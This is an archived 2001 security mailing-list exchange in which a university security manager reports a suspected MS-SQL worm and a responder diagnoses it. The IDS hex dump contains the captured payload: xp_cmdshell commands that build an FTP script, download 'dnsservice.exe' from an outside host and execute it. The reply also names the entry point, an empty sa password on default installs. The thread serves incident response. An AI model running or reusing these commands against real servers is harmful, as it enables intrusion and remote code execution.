Re: MS-SQL Worm?

From: Arthur Donkers (A.Donkersat_private)
Date: Tue Nov 20 2001 - 08:40:02 PST

  • Next message: jabba: "Re: MS-SQL Worm?"

    Hi,
    
    This is an exploit for a default MS SQL installation. If you check your
    trace it calls xp_cmdshell (which enables anyone to run a dos command
    directly from MSSQL, much like 'system' under Unix). It ftp's a trojan
    from foo.com (dnsservice.exe) and executes it. (after glancing through
    your log).
    
    You probably have a default MSSQL 7 installation with TCPIP
    connectivity that has an sa account with an empty password.
    
    better disconnect and clean up
    
    Arthur
    
    ----- Original Message -----
    From: "Douglas P. Brown" <dugbrownat_private>
    To: <incidentsat_private>; <unisogat_private>
    Cc: "ITS Security" <securityat_private>
    Sent: Tuesday, November 20, 2001 3:54 PM
    Subject: MS-SQL Worm?
    
    
    >
    > We saw a scan come in looking for systems answering on 1433, and
    > immediately saw several systems start scanning out for other systems
    > answering on 1433 - worm behavior?  Has anyone else seen this?
    >
    > thanks,
    > -Doug
    > --
    > Douglas P. Brown
    > University of North Carolina
    > Manager of Security Resources
    > 105 Abernethy Hall
    >
    >
    > Nov 20 09:38:19 x.x.92.228:2884 -> x.x.90.70:1433 SYN ******S*
    > Nov 20 09:38:19 x.x.92.228:2886 -> x.x.92.70:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2503 -> x.x.73.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2507 -> x.x.77.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2506 -> x.x.76.109:1433 SYN ******S*
    > Nov 20 09:38:20 x.x.202.182:2528 -> x.x.96.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2904 -> x.x.110.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2905 -> x.x.111.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2906 -> x.x.112.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2907 -> x.x.113.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2909 -> x.x.115.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2908 -> x.x.114.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.92.228:2910 -> x.x.116.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2911 -> x.x.117.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2913 -> x.x.119.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2912 -> x.x.118.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2915 -> x.x.121.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2914 -> x.x.120.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2916 -> x.x.122.70:1433 SYN ******S*
    > Nov 20 09:38:22 x.x.92.228:2917 -> x.x.123.70:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2532 -> x.x.99.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2533 -> x.x.100.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2535 -> x.x.102.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2538 -> x.x.105.109:1433 SYN ******S*
    > Nov 20 09:38:21 x.x.202.182:2539 -> x.x.106.109:1433 SYN ******S*
    >
    > [**] MS-SQL xp_cmdshell - program execution [**]
    > 11/20-08:01:48.923210 x.x.92.228:3348 -> x.x.200.115:1433
    > TCP TTL:127 TOS:0x0 ID:45385 IpLen:20 DgmLen:972 DF
    > ***AP*** Seq: 0x318F3D1  Ack: 0x1E5807AD  Win: 0x2098  TcpLen: 20
    > 03 01 03 A4 00 00 01 00 0A 00 73 00 70 00 5F 00  ..........s.p._.
    > 70 00 72 00 65 00 70 00 61 00 72 00 65 00 00 00  p.r.e.p.a.r.e...
    > 00 01 26 04 00 00 00 63 00 00 00 00 FF FF FF FF  ..&....c........
    > 00 00 63 62 03 00 00 62 03 00 00 65 00 78 00 65  ..cb...b...e.x.e
    > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
    > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
    > 00 63 00 68 00 6F 00 20 00 66 00 74 00 70 00 3E  .c.h.o. .f.t.p.>
    > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
    > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
    > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
    > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 66  . .'.e.c.h.o. .f
    > 00 6F 00 6F 00 2E 00 63 00 6F 00 6D 00 3E 00 3E  .o.o...c.o.m.>.>
    > 00 20 00 66 00 74 00 70 00 2E 00 78 00 27 00 0A  . .f.t.p...x.'..
    > 00 65 00 78 00 65 00 63 00 20 00 78 00 70 00 5F  .e.x.e.c. .x.p._
    > 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C 00 6C  .c.m.d.s.h.e.l.l
    > 00 20 00 27 00 65 00 63 00 68 00 6F 00 20 00 62  . .'.e.c.h.o. .b
    > 00 69 00 6E 00 3E 00 3E 00 20 00 66 00 74 00 70  .i.n.>.>. .f.t.p
    > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
    > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
    > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
    > 00 68 00 6F 00 20 00 63 00 64 00 20 00 70 00 75  .h.o. .c.d. .p.u
    > 00 62 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E  .b.>.>. .f.t.p..
    > 00 78 00 27 00 0A 00 65 00 78 00 65 00 63 00 20  .x.'...e.x.e.c.
    > 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68  .x.p._.c.m.d.s.h
    > 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68  .e.l.l. .'.e.c.h
    > 00 6F 00 20 00 63 00 64 00 20 00 74 00 6D 00 70  .o. .c.d. .t.m.p
    > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
    > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
    > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
    > 00 6C 00 6C 00 20 00 27 00 65 00 63 00 68 00 6F  .l.l. .'.e.c.h.o
    > 00 20 00 67 00 65 00 74 00 20 00 64 00 6E 00 73  . .g.e.t. .d.n.s
    > 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 2E  .s.e.r.v.i.c.e..
    > 00 65 00 78 00 65 00 3E 00 3E 00 20 00 66 00 74  .e.x.e.>.>. .f.t
    > 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65  .p...x.'...e.x.e
    > 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64  .c. .x.p._.c.m.d
    > 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65  .s.h.e.l.l. .'.e
    > 00 63 00 68 00 6F 00 20 00 63 00 6C 00 6F 00 73  .c.h.o. .c.l.o.s
    > 00 65 00 20 00 3E 00 3E 00 20 00 66 00 74 00 70  .e. .>.>. .f.t.p
    > 00 2E 00 78 00 27 00 0A 00 65 00 78 00 65 00 63  ...x.'...e.x.e.c
    > 00 20 00 78 00 70 00 5F 00 63 00 6D 00 64 00 73  . .x.p._.c.m.d.s
    > 00 68 00 65 00 6C 00 6C 00 20 00 27 00 65 00 63  .h.e.l.l. .'.e.c
    > 00 68 00 6F 00 20 00 71 00 75 00 69 00 74 00 20  .h.o. .q.u.i.t.
    > 00 3E 00 3E 00 20 00 66 00 74 00 70 00 2E 00 78  .>.>. .f.t.p...x
    > 00 27 00 0A 00 65 00 78 00 65 00 63 00 20 00 78  .'...e.x.e.c. .x
    > 00 70 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65  .p._.c.m.d.s.h.e
    > 00 6C 00 6C 00 20 00 27 00 66 00 74 00 70 00 20  .l.l. .'.f.t.p.
    > 00 2D 00 73 00 3A 00 66 00 74 00 70 00 2E 00 78  .-.s.:.f.t.p...x
    > 00 20 00 32 00 30 00 37 00 2E 00 32 00 39 00 2E  . .2.0.7...2.9..
    > 00 31 00 39 00 32 00 2E 00 31 00 36 00 30 00 27  .1.9.2...1.6.0.'
    > 00 0A 00 65 00 78 00 65 00 63 00 20 00 78 00 70  ...e.x.e.c. .x.p
    > 00 5F 00 63 00 6D 00 64 00 73 00 68 00 65 00 6C  ._.c.m.d.s.h.e.l
    > 00 6C 00 20 00 27 00 64 00 65 00 6C 00 20 00 66  .l. .'.d.e.l. .f
    > 00 74 00 70 00 2E 00 78 00 27 00 0A 00 65 00 78  .t.p...x.'...e.x
    > 00 65 00 63 00 20 00 78 00 70 00 5F 00 63 00 6D  .e.c. .x.p._.c.m
    > 00 64 00 73 00 68 00 65 00 6C 00 6C 00 20 00 27  .d.s.h.e.l.l. .'
    > 00 73 00 74 00 61 00 72 00 74 00 20 00 64 00 6E  .s.t.a.r.t. .d.n
    > 00 73 00 73 00 65 00 72 00 76 00 69 00 63 00 65  .s.s.e.r.v.i.c.e
    > 00 2E 00 65 00 78 00 65 00 27 00 0A 00 00 00 38  ...e.x.e.'.....8
    > 01 00 00 00                                      ....
    >
    > --------------------------------------------------------------------------
    --
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see: http://aris.securityfocus.com
    >
    
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
    



    This archive was generated by hypermail 2b30 : Tue Nov 20 2001 - 11:18:53 PST